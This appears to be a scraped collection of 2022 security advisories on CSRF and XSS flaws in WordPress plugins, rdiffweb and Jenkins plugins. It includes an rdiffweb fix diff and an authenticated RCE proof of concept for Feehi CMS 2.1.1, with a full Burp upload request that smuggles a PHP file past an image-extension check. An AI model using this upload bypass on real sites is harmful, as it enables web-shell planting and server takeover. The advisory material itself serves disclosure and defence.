Cross-Site Request Forgery (CSRF) vulnerability in Rate my Post – WP Rating System plugin <= 3.3.4 at WordPress.

CVE-2022-40671

The Image Hover Effects Ultimate plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Title & Description values that can be added to an Image Hover in versions up to, and including, 9.7.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. By default, the plugin only allows administrators access to edit Image Hovers, however, if a site admin makes the plugin's features available to lower privileged users through the 'Who Can Edit?' setting then this can be exploited by those users.

CVE-2022-2937: Vulnerability Advisories - Wordfence

Feehi CMS version 2.1.1 suffers from an authenticated remote code execution vulnerability.

    # Exploit Title: Feehi CMS 2.1.1 - Remote Code Execution (RCE) (Authenticated)# Date: 22-08-2022# Exploit Author: yuyudhn# Vendor Homepage: https://feehi.com/# Software Link: https://github.com/liufee/cms# Version: 2.1.1 (REQUIRED)# Tested on: Linux, Docker# CVE : CVE-2022-34140# Proof of Concept:1. Login using admin account at http://feehi-cms.local/admin2. Go to Ad Management menu. http://feehi-cms.local/admin/index.php?r=ad%2Findex3. Create new Ad. http://feehi-cms.local/admin/index.php?r=ad%2Fcreate4. Upload php script with jpg/png extension, and using Burp suite or any tamper data browser add ons, change back the extension to php.5. Shell location: http://feehi-cms.local/uploads/setting/ad/[some_random_id].php# Burp request example:POST /admin/index.php?r=ad%2Fcreate HTTP/1.1Host: feehi-cms.localContent-Length: 1530Cache-Control: max-age=0sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1Origin: http://feehi-cms.localContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFBYJ8wfp9LBoF4xgUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://feehi-cms.local/admin/index.php?r=ad%2FcreateAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: _csrf=807bee7110e873c728188300428b64dd155c422c1ebf36205f7ac2047eef0982a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22H9zz-zoIIPm7GEDiUGwm81TqyoAb5w0U%22%3B%7D; PHPSESSID=aa1dec72025b1524ae0156d527007e53; BACKEND_FEEHICMS=7f608f099358c22d4766811704a93375; _csrf_backend=3584dfe50d9fe91cfeb348e08be22c1621928f41425a41360b70c13e7c6bd2daa%3A2%3A%7Bi%3A0%3Bs%3A13%3A%22_csrf_backend%22%3Bi%3A1%3Bs%3A32%3A%22jQjzwf12TCyw_BLdszCqpz4zjphcQrmP%22%3B%7DConnection: close------WebKitFormBoundaryFBYJ8wfp9LBoF4xgContent-Disposition: form-data; name="_csrf_backend"FvaDqWC07mTGiOuZr-Qzyc2NlSACNuyPM4w7qXxTgmZ8p-nTF9LfVpLLku7wpn-tvvfWUXJM2PVZ_FPKLSHvNg==------WebKitFormBoundaryFBYJ8wfp9LBoF4xgContent-Disposition: form-data; name="AdForm[name]"rce------WebKitFormBoundaryFBYJ8wfp9LBoF4xgContent-Disposition: form-data; name="AdForm[tips]"rce at Ad management------WebKitFormBoundaryFBYJ8wfp9LBoF4xgContent-Disposition: form-data; name="AdForm[input_type]"1------WebKitFormBoundaryFBYJ8wfp9LBoF4xgContent-Disposition: form-data; name="AdForm[ad]"------WebKitFormBoundaryFBYJ8wfp9LBoF4xgContent-Disposition: form-data; name="AdForm[ad]"; filename="asuka.php"Content-Type: image/png<?php phpinfo();------WebKitFormBoundaryFBYJ8wfp9LBoF4xgContent-Disposition: form-data; name="AdForm[link]"--------------

Feehi CMS 2.1.1 Remote Code Execution

rdiffwen prior to version 2.4.7 is vulnerable to Cross-Site Request Forgery (CSRF). An attacker can change a user's email ID. Version 2.4.7 has a fix for this issue.

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2022-3274

**rdiffweb Cross-Site Request Forgery vulnerability can lead to user email ID being changed**

High severity GitHub Reviewed Published Sep 23, 2022 • Updated Sep 23, 2022

**Package**

pip rdiffweb (pip)

**Affected versions**

< 2.4.7

**Description**

GHSA-gmj8-84r4-h46j: rdiffweb Cross-Site Request Forgery vulnerability can lead to user email ID being changed

Cross-Site Request Forgery (CSRF) in GitHub repository ikus060/rdiffweb prior to 2.4.7.

@@ -116,18 +116,19 @@ def render\_prefs\_panel(self, panelid, action=None, \*\*kwargs): # @UnusedVariable

\# Process the parameters.

profile\_form \= UserProfileForm(email\=self.app.currentuser.email)

password\_form \= UserPasswordForm()

if action \== "set\_profile\_info":

self.\_handle\_set\_profile\_info(action, profile\_form)

elif action \== "set\_password":

self.\_handle\_set\_password(action, password\_form)

elif action \== "update\_repos":

self.app.currentuser.refresh\_repos(delete\=True)

flash(\_("Repositories successfully updated"), level\='success')

elif action is None:

pass

else:

\_logger.warning("unknown action: %s", action)

raise cherrypy.NotFound("Unknown action")

if cherrypy.request.method \== 'POST':

if action \== "set\_profile\_info":

self.\_handle\_set\_profile\_info(action, profile\_form)

elif action \== "set\_password":

self.\_handle\_set\_password(action, password\_form)

elif action \== "update\_repos":

self.app.currentuser.refresh\_repos(delete\=True)

flash(\_("Repositories successfully updated"), level\='success')

elif action is None:

pass

else:

\_logger.warning("unknown action: %s", action)

raise cherrypy.NotFound("Unknown action")

params \= {

'profile\_form': profile\_form,

'password\_form': password\_form,

CVE-2022-3274: Mitigate CSRF on user's settings  #221 · ikus060/rdiffweb@e974df7

Cross-Site Request Forgery (CSRF) in GitHub repository ikus060/rdiffweb prior to 2.4.6.

CVE-2022-3267

A cross-site request forgery (CSRF) vulnerability in Jenkins NS-ND Integration Performance Publisher Plugin 4.8.0.129 and earlier allows attackers to connect to an attacker-specified webserver using attacker-specified credentials. Version 4.8.0.130 requires POST requests and Overall/Administer permission for the affected form validation method.

**Jenkins NS-ND Integration Performance Publisher Plugin vulnerable to Cross-Site Request Forgery**

High severity GitHub Reviewed Published Sep 22, 2022 • Updated Sep 23, 2022

GHSA-jjch-7g85-4m72: Jenkins NS-ND Integration Performance Publisher Plugin vulnerable to Cross-Site Request Forgery

A cross-site request forgery (CSRF) vulnerability in Jenkins SCM HttpClient Plugin 1.5 and earlier allows attackers to connect to an attacker-specified HTTP server using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.

**Jenkins SCM HttpClient Plugin vulnerable to Cross-Site Request Forgery**

High severity GitHub Reviewed Published Sep 22, 2022 • Updated Sep 23, 2022

GHSA-6cvr-rvpm-9wx4: Jenkins SCM HttpClient Plugin vulnerable to Cross-Site Request Forgery

rdiffweb prior to 2.4.6 is vulnerable to Cross-Site Request Forgery (CSRF), which could lead to disabling notifications in a user's profile.

**rdiffweb CSRF could lead to disabling notifications in user profile**

Moderate severity GitHub Reviewed Published Sep 22, 2022 • Updated Sep 22, 2022

Tag

#csrf